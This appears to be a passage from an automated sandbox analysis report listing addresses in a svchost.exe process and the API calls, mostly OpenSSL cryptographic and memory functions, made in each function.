Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3C610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE3C610
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free, 46_2_00007FFA2CE6A5C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE827B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CE827B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7E790 CRYPTO_free, 46_2_00007FFA2CE7E790
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE70770 CRYPTO_clear_free,CRYPTO_free, 46_2_00007FFA2CE70770
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE72740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free, 46_2_00007FFA2CE72740
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7E730 CRYPTO_free, 46_2_00007FFA2CE7E730
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE28720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE28720
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6C700 CRYPTO_malloc,memcmp,memcpy,memcpy, 46_2_00007FFA2CE6C700
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2E700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE2E700
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7E6D0 CRYPTO_malloc, 46_2_00007FFA2CE7E6D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4A8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free, 46_2_00007FFA2CE4A8B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE668B0 CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE668B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEAA8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CEAA8B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEAC890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free, 46_2_00007FFA2CEAC890
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2E880 CRYPTO_THREAD_run_once, 46_2_00007FFA2CE2E880
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE92880 CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE92880
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE22860 CRYPTO_zalloc,InitializeCriticalSection, 46_2_00007FFA2CE22860
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7A850 CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE7A850
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE78850 CRYPTO_realloc, 46_2_00007FFA2CE78850
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE44840
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6E810 CRYPTO_zalloc, 46_2_00007FFA2CE6E810
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE28812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new, 46_2_00007FFA2CE28812
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE74800 OPENSSL_LH_delete,CRYPTO_free, 46_2_00007FFA2CE74800
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE227F0 DeleteCriticalSection,CRYPTO_free, 46_2_00007FFA2CE227F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9C7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free, 46_2_00007FFA2CE9C7E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE707D0 CRYPTO_malloc,memcpy,CRYPTO_free, 46_2_00007FFA2CE707D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free, 46_2_00007FFA2CE6A7D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE767D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts, 46_2_00007FFA2CE767D1
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE741B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert, 46_2_00007FFA2CE741B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE36190 CRYPTO_malloc,CRYPTO_free, 46_2_00007FFA2CE36190
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug, 46_2_00007FFA2CE8C190
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA6190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free, 46_2_00007FFA2CEA6190
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE78160 CRYPTO_memdup, 46_2_00007FFA2CE78160
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE44160
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE48140 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE48140
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE70130 CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE70130
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE30130 CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE30130
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE68120 CRYPTO_free, 46_2_00007FFA2CE68120
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44120 CRYPTO_set_ex_data, 46_2_00007FFA2CE44120
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE540E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 46_2_00007FFA2CE540E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE340E0 CRYPTO_get_ex_data, 46_2_00007FFA2CE340E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6C0D0 CRYPTO_free, 46_2_00007FFA2CE6C0D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE302B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free, 46_2_00007FFA2CE302B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE44260
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3E220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free, 46_2_00007FFA2CE3E220
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE621E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl, 46_2_00007FFA2CE621E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE381E0 CRYPTO_get_ex_data, 46_2_00007FFA2CE381E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7A1D0 CRYPTO_realloc, 46_2_00007FFA2CE7A1D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE44380
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE90340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug, 46_2_00007FFA2CE90340
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE54330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 46_2_00007FFA2CE54330
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free, 46_2_00007FFA2CE5A330
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3A330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE3A330
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE822F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE822F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA82E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CEA82E7
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8A2E0 RAND_bytes_ex,CRYPTO_malloc,memset, 46_2_00007FFA2CE8A2E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE342D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE342D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free, 46_2_00007FFA2CE6A2C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4C2C0 CRYPTO_free, 46_2_00007FFA2CE4C2C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE262C0 CRYPTO_clear_free, 46_2_00007FFA2CE262C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA02C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CEA02C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE44490
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE62470 CRYPTO_zalloc, 46_2_00007FFA2CE62470
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE22460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free, 46_2_00007FFA2CE22460
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA4460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free, 46_2_00007FFA2CEA4460
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE40450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 46_2_00007FFA2CE40450
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CEA844C
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA8426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free, 46_2_00007FFA2CEA8426
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA8414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free, 46_2_00007FFA2CEA8414
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE58400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf, 46_2_00007FFA2CE58400
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE623F0 CRYPTO_free, 46_2_00007FFA2CE623F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE223C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE223C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE25DB0 CRYPTO_malloc, 46_2_00007FFA2CE25DB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9BDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free, 46_2_00007FFA2CE9BDB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CE99DA6
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE27DA0 CRYPTO_free, 46_2_00007FFA2CE27DA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free, 46_2_00007FFA2CE43D70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6BD60 CRYPTO_zalloc, 46_2_00007FFA2CE6BD60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE75D30 CRYPTO_free, 46_2_00007FFA2CE75D30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE49CC0 EVP_MAC_CTX_free,CRYPTO_free, 46_2_00007FFA2CE49CC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy, 46_2_00007FFA2CE99CC1
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4DEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free, 46_2_00007FFA2CE4DEA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE87E90 CRYPTO_malloc,COMP_expand_block, 46_2_00007FFA2CE87E90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE95E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE95E80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE61E70 CRYPTO_realloc, 46_2_00007FFA2CE61E70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE59E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free, 46_2_00007FFA2CE59E60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43E50 CRYPTO_free,CRYPTO_memdup, 46_2_00007FFA2CE43E50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE75E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE75E20
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE73E10 CRYPTO_malloc,CRYPTO_free, 46_2_00007FFA2CE73E10
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2DE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE2DE10
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE49E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free, 46_2_00007FFA2CE49E00
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug, 46_2_00007FFA2CE8DDE0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE55FA0 CRYPTO_realloc, 46_2_00007FFA2CE55FA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEABFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free, 46_2_00007FFA2CEABFA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE29F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse, 46_2_00007FFA2CE29F90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2DF70 CRYPTO_malloc,BIO_snprintf, 46_2_00007FFA2CE2DF70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE49F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy, 46_2_00007FFA2CE49F30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE91F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE91F30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43F00 CRYPTO_free,CRYPTO_strdup, 46_2_00007FFA2CE43F00
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE77EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE77EC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE21EC0 CRYPTO_free, 46_2_00007FFA2CE21EC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE90070 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug, 46_2_00007FFA2CE90070
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44060 CRYPTO_free,CRYPTO_memdup, 46_2_00007FFA2CE44060
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4A030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid, 46_2_00007FFA2CE4A030
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE60010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free, 46_2_00007FFA2CE60010
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE62000 CRYPTO_free, 46_2_00007FFA2CE62000
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2BFF0 CRYPTO_THREAD_run_once, 46_2_00007FFA2CE2BFF0
